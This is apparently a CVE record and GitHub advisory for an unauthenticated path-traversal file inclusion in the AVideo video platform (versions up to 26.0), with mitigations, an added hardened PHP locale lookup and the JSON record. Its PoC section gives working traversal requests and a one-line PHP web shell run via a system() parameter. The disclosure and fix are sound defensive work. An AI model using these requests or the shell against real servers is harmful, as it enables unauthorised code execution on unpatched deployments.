CVE-2026-33513 (assigner: GitHub_M), published 2026-03-23 18:21, state PUBLISHED, CVE record data version 5.2. Problem types: CWE-22, CWE-98.

AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)

WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available.

Problem type

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Affected products

WWBN AVideo: <= 26.0 (affected)

References

GitHub Security Advisory GHSA-8fw8-q79c-fp9m: AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)
https://github.com/advisories/GHSA-8fw8-q79c-fp9m

Summary

An unauthenticated API endpoint (APIName=locale) concatenates user input into an include path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., view/about.php), and it can escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree.

Details

  • Entry point: plugin/API/get.json.php sets $global['bypassSameDomainCheck']=1 and merges GET/POST/JSON into $parameters without authentication or API secret.
  • Handler: plugin/API/API.php, method get_api_locale() (lines ~5009–5023):
    $parameters['language'] = strtolower($parameters['language']);
    $file = "{$global['systemRootPath']}locale/{$parameters['language']}.php";
    if (!file_exists($file)) { return new ApiObject("This language does not exists"); }
    include $file;
    
    No validation is performed; ../ traversal is accepted.
  • Because include executes PHP, any reachable PHP file is executed in the web server context.

PoC

  1. Fetch an arbitrary PHP file (no auth):
    GET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1
    Host: <target>
    
    Response returns the rendered About page HTML, proving traversal outside locale/.
  2. RCE with an attacker PHP file (any writable PHP path):
    GET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoami
    
    If shell.php contains <?php system($_GET['x']); ?>, the response includes command output.

Impact

  • Unauthenticated file inclusion of arbitrary PHP files under the web root.
  • Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.
  • Potential RCE if any attacker-writable PHP file exists elsewhere (not confirmed in this build).
  • Affects any deployment with the API plugin enabled (default in docker-compose).

Mitigation

  • Reject path separators/dots and enforce a strict allowlist of locale slugs.
  • realpath the target and ensure it stays within $systemRootPath/locale.
  • Stop using include for translations; load data from vetted formats (JSON/array).
  • Add authentication (API secret/token) to the endpoint as a secondary control.
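The first two mitigations (strict slug allowlist, then realpath containment) worked through as a hardened lookup for the locale handler; this is an added example, not AVideo's own code. $global['systemRootPath'] comes from the advisory, while the slug grammar, the locale directory name and the temporary demo tree are assumptions.

```php
<?php
// Added example (not AVideo project code): hardened lookup for the locale
// handler quoted above. $global['systemRootPath'] comes from the advisory;
// the slug grammar and the temporary demo tree below are assumptions.

// Allowlist the slug shape ("en", "pt_BR"). Dots, slashes and backslashes can
// never pass, so "../view/about" is rejected before any filesystem access.
function is_valid_locale_slug(string $slug): bool
{
    return preg_match('/^[a-z]{2,3}(?:[_-][a-z0-9]{2,8})?$/i', $slug) === 1;
}

// Canonicalise with realpath() and require the result to stay inside $localeDir.
// Returns the resolved file, or null for a missing file or an escape attempt.
function resolve_locale_path(string $localeDir, string $slug): ?string
{
    $base = realpath($localeDir);
    if ($base === false) {
        return null;
    }
    $file = realpath($base . DIRECTORY_SEPARATOR . $slug . '.php');
    if ($file === false) {
        return null; // no such translation file
    }
    // Compare against "<base>/" so a sibling such as "locale_x/" cannot match.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Same inputs as the vulnerable handler: validate, canonicalise, and only then
// hand the path back. Including it or parsing it as data is the caller's choice.
function locale_file_for_request(array $global, array $parameters): ?string
{
    $slug = strtolower((string) ($parameters['language'] ?? ''));
    if (!is_valid_locale_slug($slug)) {
        return null;
    }
    return resolve_locale_path($global['systemRootPath'] . 'locale', $slug);
}

// Self-check on a constructed temporary tree: locale/en.php beside view/about.php.
$root = sys_get_temp_dir() . '/avideo_lfi_demo_' . getmypid() . '/';
mkdir($root . 'locale', 0700, true);
mkdir($root . 'view', 0700, true);
file_put_contents($root . 'locale/en.php', "<?php return ['hello' => 'Hello'];");
file_put_contents($root . 'view/about.php', "<?php echo 'about';");
$global = ['systemRootPath' => $root];
var_dump(locale_file_for_request($global, ['language' => 'EN']) !== null);
var_dump(locale_file_for_request($global, ['language' => '../view/about']) === null);
var_dump(resolve_locale_path($root . 'locale', '../view/about') === null); // realpath layer alone
```

The last check exercises the realpath layer on its own so that a regression in the allowlist still leaves the traversal blocked; the third mitigation (loading translations as data instead of executing them) is the step to take after the path is contained.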

JSON source

https://cveawg.mitre.org/api/cve/CVE-2026-33513
{
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "cveMetadata": {
    "cveId": "CVE-2026-33513",
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "dateUpdated": "2026-03-23T18:21:59.156Z",
    "dateReserved": "2026-03-20T16:59:08.891Z",
    "datePublished": "2026-03-23T18:21:59.156Z",
    "state": "PUBLISHED"
  },
  "containers": {
    "cna": {
      "providerMetadata": {
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M",
        "dateUpdated": "2026-03-23T18:21:59.156Z"
      },
      "title": "AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)",
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available."
        }
      ],
      "affected": [
        {
          "vendor": "WWBN",
          "product": "AVideo",
          "versions": [
            {
              "version": "<= 26.0",
              "status": "affected"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')",
              "cweId": "CWE-22",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')",
              "cweId": "CWE-98",
              "type": "CWE"
            }
          ]
        }
      ],
      "references": [
        {
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m",
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m",
          "tags": [
            "x_refsource_CONFIRM"
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW",
            "baseScore": 8.6,
            "baseSeverity": "HIGH"
          }
        }
      ]
    }
  }
}